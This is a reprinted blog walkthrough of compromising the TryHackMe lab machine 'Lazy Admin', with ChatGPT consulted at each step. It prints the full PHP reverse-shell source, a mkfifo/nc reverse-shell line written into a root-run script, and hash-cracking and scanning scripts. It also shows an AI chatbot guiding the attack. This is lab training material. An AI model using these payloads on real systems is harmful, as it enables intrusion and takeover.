Hands-on | Using ChatGPT in penetration testing (reprinted)

Reprinted from 安全帮Live

How ChatGPT can help with a penetration test.

Using ChatGPT to compromise the Linux machine "Lazy Admin" on tryhackme.com.

Assuming only basic hacking knowledge, we start by asking ChatGPT what the first step of a penetration test should be.

It tells us to gather information about the target and look for vulnerabilities by running a network scan, and recommends nmap. Next we ask ChatGPT how to run an Nmap scan on Linux.

This is the target's IP; we try to compromise it.

I adjusted the command's syntax to make the scan faster. Scan result: ports 22 and 80 are open, so we try port 80.

Port 80 is running Apache2.
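As an added example (not part of the original post), here is the scanning step as a practitioner would script it: build the nmap command, including the "faster" timing flags, and parse nmap's grepable output instead of reading the screen. The flags used are a choice of mine, not the author's, and the grepable output embedded below is constructed sample data, not a capture from the machine.

```python
"""Nmap scan plus grepable-output parsing (added example, not from the original post).

The scan flags are assumptions; SAMPLE_GREPABLE is constructed sample data.
"""
import re
import subprocess
from typing import List, Tuple

# (port, protocol, state, service name, version banner)
PortInfo = Tuple[int, str, str, str, str]

# Constructed nmap -oG output for illustration; not a real capture.
SAMPLE_GREPABLE = """# Nmap scan initiated (constructed sample)
Host: 10.10.117.255 ()\tStatus: Up
Host: 10.10.117.255 ()\tPorts: 22/open/tcp//ssh//OpenSSH 7.2p2 Ubuntu/, 80/open/tcp//http//Apache httpd 2.4.18/, 443/closed/tcp//https///\tIgnored State: closed (997)
# Nmap done (constructed sample)
"""

def build_nmap_cmd(target: str, fast: bool = True) -> List[str]:
    """Return the nmap argv. -oG - writes grepable output to stdout so it can be parsed.
    The fast variant raises the timing template and packet rate; the trade-off is more
    noise on the wire and a higher chance of missed ports over a lossy VPN link."""
    cmd = ["nmap", "-sV", "-p-", "-oG", "-"]
    if fast:
        cmd += ["-T4", "--min-rate", "1000"]
    return cmd + [target]

# Grepable port entry: port/state/protocol/owner/service/rpc info/version/
PORT_RE = re.compile(r"(\d+)/(\w+)/(\w+)/([^/,]*)/([^/,]*)/([^/,]*)/([^/,]*)/")

def parse_grepable(text: str) -> List[PortInfo]:
    """Parse every 'Ports:' field in grepable output into PortInfo tuples."""
    results: List[PortInfo] = []
    for line in text.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue
        # Fields on a Host line are tab-separated; keep only the Ports field.
        ports_field = line.split("Ports:", 1)[1].split("\t", 1)[0]
        for m in PORT_RE.finditer(ports_field):
            port, state, proto, _owner, service, _rpc, version = m.groups()
            results.append((int(port), proto, state, service, version.strip()))
    return results

def open_ports(text: str) -> List[PortInfo]:
    return [p for p in parse_grepable(text) if p[2] == "open"]

def scan(target: str) -> List[PortInfo]:
    """Run the real scan; needs nmap installed and network reachability to the target."""
    out = subprocess.run(build_nmap_cmd(target), capture_output=True,
                         text=True, check=True).stdout
    return open_ports(out)

if __name__ == "__main__":
    for port, proto, state, service, version in open_ports(SAMPLE_GREPABLE):
        print(f"{port}/{proto} {service} {version}")
```

Parsing the `-oG` output rather than the human-readable table is what lets the next step (pointing gobuster at whichever port runs HTTP) be automated.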

Next, ask ChatGPT how to penetration-test a web server.

It tells us to enumerate directories with gobuster.

This turns up a sensitive directory:

/content  (Status: 301) [Size: 316] [--> http://10.10.117.255/content/

This reveals the CMS and its version. Run GoBuster again against the /content directory.

More directories are found.

Among them is an SQL backup directory containing a .sql file, and inside that file is a password hash.

Then ask ChatGPT what to do with the password hash.

Following its advice, crack the hash with CrackStation: https://crackstation.net/

The cracked password is Password123. Use it to log in to the site's admin backend.

Username: manager  Password: Password123
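CrackStation is a convenient lookup, but it only covers unsalted hashes it already has in its tables, and it means sending a client's hash to a third party. As an added example (not part of the original post), here is the same step done offline: pull hex digests out of the dump, guess the algorithm from the digest length, and run a dictionary attack. The SQL fragment and wordlist below are constructed; the hash type is an assumption that is only confirmed by a successful match.

```python
"""Offline dictionary attack on a hash recovered from an SQL dump.

Added example, not from the original post (which used CrackStation).
SAMPLE_SQL and SAMPLE_WORDLIST are constructed; the algorithm guess is length-based.
"""
import hashlib
import re
from typing import Dict, Iterable, List, Optional, Tuple

# Constructed dump fragment (not the real backup from the machine).
SAMPLE_SQL = """
INSERT INTO `users` (`id`, `name`, `pass`) VALUES
(1, 'manager', '%s');
""" % hashlib.md5(b"Password123").hexdigest()

# Constructed wordlist; a real run would stream rockyou.txt line by line (rstrip the newline).
SAMPLE_WORDLIST = ["123456", "password", "admin", "Password123", "letmein"]

HEX_RE = re.compile(r"\b[0-9a-fA-F]{32,128}\b")
# Digest length in hex chars -> candidate unsalted algorithms to try.
ALGOS_BY_LEN: Dict[int, List[str]] = {32: ["md5"], 40: ["sha1"], 64: ["sha256"], 128: ["sha512"]}

def extract_hashes(sql: str) -> List[str]:
    """Return lower-cased hex strings whose length matches a common digest size."""
    return [h.lower() for h in HEX_RE.findall(sql) if len(h) in ALGOS_BY_LEN]

def crack(target: str, words: Iterable[str]) -> Optional[Tuple[str, str]]:
    """Return (algorithm, password) on a hit, else None.
    Unsalted digests only: a salted or bcrypt/argon2 hash will never match here
    and needs hashcat or john with the right mode."""
    target = target.lower()
    algos = ALGOS_BY_LEN.get(len(target), [])
    for word in words:
        for algo in algos:
            if hashlib.new(algo, word.encode()).hexdigest() == target:
                return algo, word
    return None

if __name__ == "__main__":
    for h in extract_hashes(SAMPLE_SQL):
        print(h, "->", crack(h, SAMPLE_WORDLIST))
```

The length-based guess is the same heuristic CrackStation applies; when the application is known (here, the CMS found by gobuster), reading its login code tells you the exact scheme and removes the guesswork.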

In the Ads section you can add a script to get a reverse connection. I prepared a PHP reverse shell in advance, and asked ChatGPT how to use a PHP reverse shell script.

It suggests the pentestmonkey php-reverse-shell. Here is the pentestmonkey code:

<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 [email protected]

set_time_limit (0);
$VERSION = "1.0";
$ip = '10.10.14.35';  // CHANGE THIS to the attacker's (tun0) IP
$port = 4420;         // CHANGE THIS to the listener port
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;

//
// Daemonise ourself if possible to avoid zombies later
//

// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies. Worth a try...
if (function_exists('pcntl_fork')) {
    // Fork and have the parent process exit
    $pid = pcntl_fork();

    if ($pid == -1) {
        printit("ERROR: Can't fork");
        exit(1);
    }

    if ($pid) {
        exit(0); // Parent exits
    }

    // Make the current process a session leader
    // Will only succeed if we forked
    if (posix_setsid() == -1) {
        printit("Error: Can't setsid()");
        exit(1);
    }

    $daemon = 1;
} else {
    printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}

// Change to a safe directory
chdir("/");

// Remove any umask we inherited
umask(0);

//
// Do the reverse shell...
//

// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
    printit("$errstr ($errno)");
    exit(1);
}

// Spawn shell process
$descriptorspec = array(
    0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
    1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
    2 => array("pipe", "w")   // stderr is a pipe that the child will write to
);

$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {
    printit("ERROR: Can't spawn shell");
    exit(1);
}

// Set everything to non-blocking
// Reason: Occasionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);

printit("Successfully opened reverse shell to $ip:$port");

while (1) {
    // Check for end of TCP connection
    if (feof($sock)) {
        printit("ERROR: Shell connection terminated");
        break;
    }

    // Check for end of STDOUT
    if (feof($pipes[1])) {
        printit("ERROR: Shell process terminated");
        break;
    }

    // Wait until a command is sent down $sock, or some
    // command output is available on STDOUT or STDERR
    $read_a = array($sock, $pipes[1], $pipes[2]);
    $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

    // If we can read from the TCP socket, send
    // data to process's STDIN
    if (in_array($sock, $read_a)) {
        if ($debug) printit("SOCK READ");
        $input = fread($sock, $chunk_size);
        if ($debug) printit("SOCK: $input");
        fwrite($pipes[0], $input);
    }

    // If we can read from the process's STDOUT
    // send data down tcp connection
    if (in_array($pipes[1], $read_a)) {
        if ($debug) printit("STDOUT READ");
        $input = fread($pipes[1], $chunk_size);
        if ($debug) printit("STDOUT: $input");
        fwrite($sock, $input);
    }

    // If we can read from the process's STDERR
    // send data down tcp connection
    if (in_array($pipes[2], $read_a)) {
        if ($debug) printit("STDERR READ");
        $input = fread($pipes[2], $chunk_size);
        if ($debug) printit("STDERR: $input");
        fwrite($sock, $input);
    }
}

fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);

// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
    global $daemon;  // without this the function never sees the flag set above
    if (!$daemon) {
        print "$string\n";
    }
}

?>

Copy the code into the Ads section to create a file. Don't forget to change the IP and port: set your tun0 IP and change the port to 9001.

After modification:

After clicking Done, the reverse-shell PHP script is generated in the directory, as shown below.

Start an nc listener first to catch the reverse shell:

nc -lvnp 9001

Browse to revshell.php and the connection is established.

Go to the home directory and get flag.txt.

Copy and paste it there, and the machine counts as hacked.

Next we need to escalate privileges and get root. First enter the following command to upgrade the raw reverse shell to an interactive TTY:

python3 -c 'import pty;pty.spawn("/bin/bash")'

Then enter this, again changing the IP to your tun0 IP. The user we landed as can run /home/itguy/backup.pl with sudo, and that script executes /etc/copy.sh, which we can write to, so whatever we put in copy.sh will run as root:

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.8.39.120 443 >/tmp/f" > /etc/copy.sh

Now start another nc listener, this time on port 443, as shown below:

Finally, run the last command and you get root:

sudo perl /home/itguy/backup.pl

Root obtained.

This is the first article, a brief introduction to using ChatGPT for penetration testing. In the near future I will write more articles on penetration testing with ChatGPT.

Reprinted from 安全帮Live; if this infringes your rights, contact us for removal.


Origin blog.csdn.net/weixin_63660670/article/details/129667098